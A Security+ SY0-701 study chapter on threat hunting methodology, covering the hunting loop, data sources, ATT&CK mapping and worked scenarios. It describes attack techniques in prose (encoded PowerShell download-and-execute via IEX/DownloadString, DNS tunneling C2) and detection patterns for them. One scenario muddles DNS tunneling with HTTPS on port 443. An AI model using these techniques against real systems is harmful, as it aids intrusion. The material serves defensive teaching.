This chapter covers the threat hunting methodology, a proactive security practice that seeks to identify and mitigate cyber threats before they cause damage. For the SY0-701 exam, threat hunting falls under Domain 2.0 (Threats, Vulnerabilities, and Mitigations), Objective 2.1: Explain the importance of threat hunting. Understanding this methodology is critical because it shifts the security posture from reactive to proactive, reducing dwell time and attack impact. This chapter will equip you with the structured process, tools, and mindset required to conduct effective threat hunts.
Jump to a section
Threat hunting is like a detective proactively investigating a neighborhood for signs of burglars, rather than waiting for a crime to be reported. A traditional detective (IDS/SIEM) responds to alarms—someone calls 911, and they show up to investigate. But a proactive detective (threat hunter) doesn't wait for the alarm. They walk the streets looking for unusual patterns: a ladder left against a house, a broken window, footprints in the mud, or a car circling the block multiple times. They use hypotheses: 'If a burglar is casing the area, I'd expect to see...' Then they check surveillance footage (logs), interview neighbors (endpoints), and look for tools like crowbars (malware). The key is they don't have a specific alert—they're looking for indicators of compromise (IoCs) that don't match the baseline. In cybersecurity, this means analyzing network traffic, endpoint telemetry, and logs for anomalies that bypass existing detection rules. The hunter uses the same tools as the detective: a notepad (SIEM queries), a flashlight (packet capture), and a keen eye for detail (threat intelligence). Just as a detective might find a burglary in progress before the alarm sounds, a threat hunter can discover an attacker's foothold before they exfiltrate data.
What is Threat Hunting?
Threat hunting is the proactive and iterative process of searching through network, endpoint, and log data to detect and isolate advanced threats that evade existing security controls. Unlike automated detection systems (e.g., SIEM rules, antivirus) that rely on known signatures or predefined anomalies, threat hunting assumes that a breach has already occurred or is in progress. The goal is to reduce the mean time to detect (MTTD) and mean time to respond (MTTR) by identifying suspicious activity that doesn't trigger alerts.
The Threat Hunting Loop
The methodology follows a structured loop: (1) Formulate a hypothesis based on threat intelligence or observed anomalies, (2) Collect and analyze data from various sources (e.g., firewalls, endpoints, DNS logs), (3) Investigate findings to confirm or refute the hypothesis, (4) Respond and remediate if a threat is found, and (5) Feed insights back to improve detection rules and future hunts. This loop is continuous and iterative.
Hypothesis-Driven vs. Data-Driven Hunting
There are two primary approaches: hypothesis-driven and data-driven. Hypothesis-driven hunting starts with a question like 'Is there evidence of lateral movement using PsExec?' based on a new vulnerability or TTP (Tactics, Techniques, and Procedures). Data-driven hunting examines a dataset (e.g., all outbound connections to new IPs) and looks for outliers without a predefined hypothesis. Both are valid, but hypothesis-driven is more structured and efficient for targeted threats.
Key Data Sources for Hunting
Network logs: Firewall logs, proxy logs, DNS logs, NetFlow/IPFIX. DNS logs are particularly valuable because many malware families generate DNS queries for C2 (command and control) domains.
Endpoint logs: Windows Event Logs (Security, System, PowerShell), Sysmon logs, EDR (Endpoint Detection and Response) telemetry. Sysmon, with Event IDs like 1 (process creation), 3 (network connection), and 11 (file creation), is a favorite among hunters.
Cloud logs: AWS CloudTrail, Azure Monitor, GCP Audit Logs. These help detect lateral movement in cloud environments.
Threat intelligence feeds: Known malicious IPs, domains, hashes, and TTPs from sources like MITRE ATT&CK, VirusTotal, and ISACs.
The Role of MITRE ATT&CK Framework
MITRE ATT&CK is a globally accessible knowledge base of adversary TTPs. Threat hunters use it to structure hypotheses. For example, a hunter might focus on the 'Lateral Movement' tactic and search for use of 'Remote Services' technique T1021.006 (Windows Remote Management). By mapping findings to ATT&CK, hunters can assess the stage of an attack and prioritize response.
Tools of the Trade
SIEM (Security Information and Event Management): Splunk, ELK Stack, Microsoft Sentinel. Used for querying large datasets and creating dashboards.
EDR (Endpoint Detection and Response): CrowdStrike, Microsoft Defender for Endpoint, SentinelOne. Provides granular endpoint telemetry.
Network Traffic Analysis: Wireshark, Zeek, RITA (Real Intelligence Threat Analyzer). For analyzing packet captures and flow data.
Threat Intelligence Platforms (TIP): MISP, ThreatConnect. To integrate external intelligence.
Adversary Emulation Tools: Atomic Red Team, Caldera. To simulate attacks and validate detection.
Hypothesis Formulation Example
Hypothesis: 'An attacker may be using PowerShell to download and execute payloads in our environment.' To test this, a hunter would:
1. Query all PowerShell process creation events (Event ID 4104 or 4103 in Windows) over the last 30 days.
2. Look for base64-encoded commands, download patterns (e.g., Invoke-WebRequest), or execution of encoded scripts.
3. Cross-reference with network logs for outbound connections to uncommon IPs during those PowerShell sessions.
4. If suspicious activity is found, escalate to incident response.
Indicators of Compromise (IoC) vs. Indicators of Attack (IoA)
IoC: Forensic evidence of a past compromise (e.g., a file hash, IP address, registry key). It's reactive.
IoA: Signs that an attack is in progress (e.g., unusual lateral movement, privilege escalation attempts). Threat hunting focuses on IoAs because they indicate active threats.
The Pyramid of Pain
This model illustrates how different types of IoCs impact attackers. At the base: hash values (easy to change). Above: IP addresses, domain names, network artifacts, host artifacts, tools, and at the top: TTPs (hardest to change). Threat hunters aim to identify TTPs because forcing attackers to change their behavior is the most disruptive.
Common Hunting Scenarios
Lateral Movement Detection: Look for anomalous RDP, SMB, or WinRM connections between workstations and servers. Use logs like Windows Event ID 4624 (logon) and 4648 (explicit credentials).
C2 Beaconing: Analyze network flows for periodic outbound connections to suspicious IPs on non-standard ports (e.g., TCP 443, but with irregular timing).
Data Exfiltration: Monitor large outbound transfers, especially to cloud storage or new domains. Use NetFlow and proxy logs.
Living off the Land (LotL): Hunt for misuse of built-in tools like PowerShell, WMI, BITSAdmin, and Certutil. These are often used by attackers to blend in.
Validation and Escalation
When a hunter finds suspicious activity, they must validate it: check false positives, correlate with other data, and determine severity. If confirmed, they escalate to the incident response team (CSIRT) with a detailed report including timestamps, affected systems, IoCs, and recommended containment steps. The hunter also feeds observations back to improve detection rules (e.g., adding a new SIEM correlation rule).
Challenges in Threat Hunting
Data Overload: Too much log data can obscure real threats. Prioritize high-value sources like DNS and authentication logs.
Skill Gap: Requires deep knowledge of normal behavior, attack techniques, and tool proficiency.
False Positives: Overly broad hypotheses can yield many false leads. Iterate and refine.
Budget: Advanced tools like EDR and SIEM can be expensive; smaller orgs may rely on open-source tools like Zeek and ELK.
Maturity Models
Organizations mature in hunting capabilities. The Threat Hunting Maturity Model (THMM) has four levels: Level 0 (Initial) – relies on automated alerts; Level 1 (Minimal) – incorporates threat intelligence; Level 2 (Procedural) – follows structured hunting procedures; Level 3 (Innovative) – creates new data sources and automates hunts. SY0-701 expects candidates to understand that hunting is a mature security practice beyond basic alert monitoring.
Real-World Example: SolarWinds Breach
In the SolarWinds attack (2020), threat hunters who proactively searched for unusual DNS queries to known C2 infrastructure could have detected the Sunburst backdoor earlier. The malware used DNS tunneling to communicate with domains mimicking legitimate services. A hunter focusing on DNS anomalies—like long subdomains or excessive NXDOMAIN responses—might have uncovered the breach months before the public disclosure.
Summary of Key Steps
Hypothesize: Based on threat intel or anomalies.
Collect: Gather relevant data from logs, endpoints, network.
Analyze: Use tools to find patterns and outliers.
Validate: Confirm findings and rule out false positives.
Respond: Escalate to incident response.
Improve: Update detection rules and share intelligence.
Formulate a Hypothesis
The first step is to create a testable hypothesis based on threat intelligence, recent vulnerabilities, or observed anomalies. For example, 'I suspect that an attacker is using DNS tunneling for C2 communication because we noticed unusual DNS query patterns from a few internal hosts.' The hypothesis should be specific and actionable. It often references MITRE ATT&CK techniques (e.g., T1572: Protocol Tunneling). During this step, the hunter defines the scope (timeframe, systems, data sources) and success criteria (what would confirm the hypothesis). A common mistake is making the hypothesis too broad, like 'Is there malware?' which leads to unfocused analysis.
Collect Relevant Data
Based on the hypothesis, the hunter identifies and gathers data from appropriate sources. For DNS tunneling, this includes DNS query logs from the DNS server or proxy logs, network flow data (NetFlow/IPFIX) to see traffic patterns, and possibly endpoint logs for processes that generate DNS queries. Tools like Splunk or ELK can query large datasets. The hunter ensures data covers the relevant timeframe (e.g., last 7 days) and includes necessary fields (source IP, query name, response code, etc.). Data collection must be efficient to avoid overwhelming storage or bandwidth. A common pitfall is collecting too much irrelevant data, which slows analysis.
Analyze Data for Anomalies
The hunter uses analytical techniques to find deviations from the baseline. For DNS tunneling, this might involve looking for: (1) high volume of DNS queries to a single domain, (2) queries with long subdomains (e.g., 'base64encodeddata.malicious.com'), (3) queries with high entropy in the domain name, (4) queries to domains that rarely resolve, or (5) queries from non-DNS servers. Tools like RITA (Real Intelligence Threat Analyzer) can automatically score domains based on suspicious characteristics. The hunter visualizes data using histograms or time series to spot spikes. This step requires understanding of normal traffic patterns; otherwise, benign traffic (e.g., CDN domains) could be mistaken for malicious.
Validate Findings
Once potential anomalies are identified, the hunter validates them to confirm they are true threats, not false positives. Validation involves cross-referencing with other data sources: check endpoint logs for the process that made the DNS queries, verify if the domain is associated with known malware via threat intelligence feeds (e.g., VirusTotal), and check for other signs of compromise (e.g., unusual processes, registry changes). For DNS tunneling, the hunter might run a packet capture on the suspected host to inspect DNS payloads. If the finding is confirmed, the hunter documents evidence: timestamps, IPs, domains, hashes, and screenshots. If it's a false positive, the hunter notes the cause (e.g., legitimate application using long subdomains) and refines the hypothesis.
Escalate and Remediate
Validated threats are escalated to the incident response team (CSIRT) with a detailed report. The report includes: the hypothesis, data sources used, findings, affected systems, IoCs (domains, IPs, file hashes), and recommended containment actions (e.g., block the C2 domain at the firewall, isolate the host). The hunter may also perform immediate containment if authorized, such as adding a firewall rule to block the malicious IP. After remediation, the hunter ensures the threat is fully removed and monitors for recurrence. A common mistake is failing to provide actionable IoCs, which delays response.
Improve Detection and Share Intel
The final step is to feed lessons learned back into the security program. The hunter updates SIEM correlation rules to detect similar activity automatically (e.g., create a rule for high-entropy DNS queries). They also share IoCs and TTPs with threat intelligence platforms (e.g., MISP) and internal teams. This step closes the loop: the next hunt becomes more efficient because the detection engine now covers the previously missed threat. Additionally, the hunter documents the methodology and results in a hunt report to improve future hypotheses. Without this step, the organization remains vulnerable to the same technique.
Scenario 1: DNS Tunneling in a Financial Firm A threat hunter at a bank notices an alert from the SIEM about a high volume of DNS queries from a single workstation to a domain with long subdomains. The SIEM rule flags it as 'Possible DNS Tunneling.' The hunter begins by querying DNS logs for that workstation over the past 24 hours. They find thousands of queries to 'malicious-c2.example.com' with subdomains containing base64-encoded data. Using RITA, they confirm the domain has a high 'suspicious score' due to entropy and query frequency. The hunter then checks endpoint logs via EDR and sees a process 'svchost.exe' running from a non-standard path ('C:\Users\Public\svchost.exe') making these DNS queries. They isolate the host and escalate to incident response. The response team blocks the domain at the firewall, removes the malware, and conducts a broader hunt for similar activity. The hunter then writes a new SIEM rule to detect base64-encoded subdomains and shares the IoCs (domain, hash of the malware) with the financial sector ISAC. A common mistake in this scenario would be to ignore the alert as a false positive because the domain uses HTTPS on port 443, but DNS tunneling often uses standard ports to blend in.
Scenario 2: Lateral Movement via RDP in a Hospital A hunter in a hospital network hypothesizes that an attacker may have moved laterally using RDP after an initial phishing compromise. They collect Windows Security Event Logs (Event ID 4624) for remote logons over RDP (Logon Type 10) from internal workstations to servers. They find a pattern: a single workstation in radiology has made RDP connections to three different servers in the finance department, which is unusual because radiology staff do not need access to finance servers. The hunter also sees Event ID 4648 (explicit credentials) indicating the use of different accounts. They validate by checking EDR logs for process creation on the target servers; they find 'taskkill.exe' and 'net.exe' used to stop security services. The hunter confirms a compromise and escalates. The incident response team resets the compromised accounts, isolates the radiology workstation, and scans for persistence. The hunter then creates a detection rule for anomalous RDP connections between departments. A common mistake is to assume RDP is always legitimate because it's a common administrative tool, but cross-department RDP from a low-privilege workstation is a red flag.
Scenario 3: Living off the Land in a Tech Company A hunter in a SaaS company focuses on PowerShell abuse. They query Event ID 4104 (PowerShell script block logging) for scripts that use 'Invoke-WebRequest' or 'DownloadString.' They find a script that downloads a payload from a pastebin URL and executes it in memory. The script is base64-encoded and uses 'IEX' (Invoke-Expression). The hunter checks the endpoint's network logs and sees an outbound connection to the pastebin IP. They validate by checking the file hash of the downloaded payload on VirusTotal—it's a known backdoor. The hunter isolates the host and escalates. The response team removes the malware and checks for lateral movement. The hunter then adds a SIEM rule to flag any PowerShell script containing 'IEX' combined with 'DownloadString.' A common mistake is to overlook PowerShell logs because they are verbose; but script block logging (enabled via GPO) is critical for detecting fileless attacks.
What SY0-701 Tests on Threat Hunting Objective 2.1 requires you to explain the importance of threat hunting. The exam focuses on:
The purpose: proactive detection of threats that evade automated tools.
The methodology: hypothesis-driven, iterative process.
Key concepts: IoC vs. IoA, Pyramid of Pain, dwell time, MTTD, MTTR.
Relationship to other security functions: hunting feeds into incident response and detection engineering.
Common Wrong Answers and Why Candidates Choose Them 1. 'Threat hunting is the same as penetration testing.' Candidates confuse proactive security with offensive testing. Pen testing is authorized exploitation to find vulnerabilities; threat hunting is searching for active threats. The exam distinguishes them: pen tests are periodic, hunting is continuous. 2. 'Threat hunting replaces the need for a SIEM.' Candidates think hunting is a substitute for automated detection. In reality, hunting complements SIEM—it finds what SIEM misses. 3. 'Hunting only uses IoCs.' Many candidates focus on IoCs (hashes, IPs) because they are concrete. But the exam emphasizes hunting for IoAs and TTPs, which are more sophisticated. 4. 'Hunting is a one-time activity.' The iterative nature of hunting is often misunderstood. The exam expects you to know that hunting is a continuous process.
Specific Terms and Acronyms - Dwell time: The length of time an attacker is present in the environment before detection. - Hypothesis: A testable statement about potential adversary activity. - Pyramid of Pain: Model showing difficulty of changing IoCs; TTPs are at the top. - IoA (Indicator of Attack): Signs of ongoing attack (e.g., lateral movement). - TTPS (Tactics, Techniques, and Procedures): Adversary behavior patterns. - MITRE ATT&CK: Framework for categorizing TTPs.
Common Trick Questions - A question might describe a scenario where an analyst reviews logs after an alert—this is incident response, not hunting. Hunting is proactive, before an alert. - Another trick: 'Which of the following is the first step in threat hunting?' The answer is 'Formulate a hypothesis,' not 'Collect data' or 'Analyze logs.'
Decision Rule for Eliminating Wrong Answers On scenario questions, ask: 'Is the action being taken before an alert or after?' If after, it's incident response, not hunting. Also, if the action involves testing for vulnerabilities (like running a vulnerability scanner), it's a vulnerability assessment or pen test. Hunting specifically looks for signs of compromise, not vulnerabilities.
Threat hunting is a proactive process that assumes a breach has already occurred.
The first step in any threat hunt is to formulate a hypothesis.
MITRE ATT&CK is the primary framework used to structure hypotheses and categorize TTPs.
Dwell time is the period an attacker remains undetected; hunting aims to reduce it.
The Pyramid of Pain illustrates that targeting TTPs is most disruptive to attackers.
Common hunting scenarios include DNS tunneling, lateral movement, and living off the land.
Hunting feeds into incident response and detection engineering to improve overall security.
Tools like Sysmon, Zeek, and RITA are commonly used for hunting.
These come up on the exam all the time. Here's how to tell them apart.
Threat Hunting
Proactive: seeks threats before alerts trigger
Hypothesis-driven or data-driven
Goal: reduce dwell time and MTTD
Output: suspicious activity report, IoCs
Performed by threat hunters or analysts
Incident Response
Reactive: responds to confirmed incidents
Alert-driven or report-driven
Goal: contain, eradicate, recover
Output: incident report, remediation steps
Performed by CSIRT or incident responders
Indicator of Compromise (IoC)
Evidence of past compromise (e.g., file hash, IP)
Reactive: used after a breach is discovered
Easy for attackers to change (e.g., new hash)
Often shared in threat intel feeds
Detectable by signature-based tools
Indicator of Attack (IoA)
Signs of ongoing attack (e.g., lateral movement)
Proactive: used to detect attacks in progress
Harder for attackers to change (TTPs)
Requires behavioral analysis
Detectable by anomaly-based tools and hunting
Mistake
Threat hunting is only for large enterprises with advanced tools.
Correct
Threat hunting can be performed by organizations of any size using free tools like Zeek, ELK, and Sysmon. The methodology scales; even small teams can hunt by focusing on high-value data sources like DNS logs.
Mistake
Threat hunting is the same as incident response.
Correct
Incident response reacts to a confirmed incident; threat hunting proactively searches for signs of compromise before an alert is triggered. Hunting may lead to incident response, but they are distinct processes.
Mistake
Threat hunting only uses automated tools and doesn't require human intuition.
Correct
While tools assist, hunting relies heavily on human creativity and intuition to formulate hypotheses and recognize subtle anomalies that automated rules miss.
Mistake
If a SIEM has no alerts, there is no need to hunt.
Correct
A lack of alerts does not mean the environment is clean; attackers may have evaded detection. Hunting is necessary to uncover stealthy threats that SIEM rules don't catch.
Mistake
Threat hunting always starts with a hypothesis.
Correct
While hypothesis-driven hunting is common, data-driven hunting (also called 'hunting without a hypothesis') starts by analyzing data for outliers. Both are valid approaches.
Threat hunting searches for active threats or signs of compromise, while vulnerability scanning identifies potential weaknesses (e.g., missing patches) that could be exploited. Hunting looks for IoCs and IoAs; scanning looks for CVEs. For the exam, remember that hunting is proactive and assumes a breach, whereas scanning is a preventive measure.
The first step is to formulate a hypothesis. This is a testable statement about potential adversary activity, such as 'An attacker may be using PowerShell to download payloads.' Without a hypothesis, the hunt lacks direction. The exam tests this order: hypothesis first, then data collection, analysis, validation, response, and improvement.
Dwell time is the duration an attacker remains undetected. Threat hunting actively searches for signs of compromise, often catching attackers earlier than automated alerts. By discovering threats during the reconnaissance or lateral movement phase (rather than after exfiltration), hunting shortens dwell time and limits damage.
The Pyramid of Pain is a model that shows how different types of IoCs impact attackers. At the base are hash values (easy to change), then IPs, domains, network artifacts, host artifacts, tools, and at the top are TTPs (hardest to change). Hunters aim to identify TTPs because forcing attackers to change their behavior is most disruptive.
Some aspects can be automated, like data collection and initial analysis (e.g., running queries for known IoCs). However, the core of hunting—hypothesis formulation, anomaly recognition, and validation—requires human intuition and expertise. The exam emphasizes that hunting is a human-driven process augmented by tools.
Threat intelligence provides context about adversary TTPs, IoCs, and emerging threats. Hunters use this intel to formulate hypotheses (e.g., 'Is there evidence of the new APT group's TTPs?') and to validate findings. Without intel, hunts may miss relevant patterns. The exam expects you to know that intel feeds into the hypothesis step.
The Cyber Kill Chain describes stages of an attack (reconnaissance, weaponization, delivery, exploitation, installation, C2, actions on objectives). Threat hunting can detect adversaries at any stage, but it's especially valuable for early stages (e.g., C2) before data exfiltration. Hunters use the kill chain to understand where in the attack lifecycle a finding falls.
You've just covered Threat Hunting Methodology — now see how well it sticks with free SY0-701 practice questions. Full explanations included, no account needed.
Done with this chapter?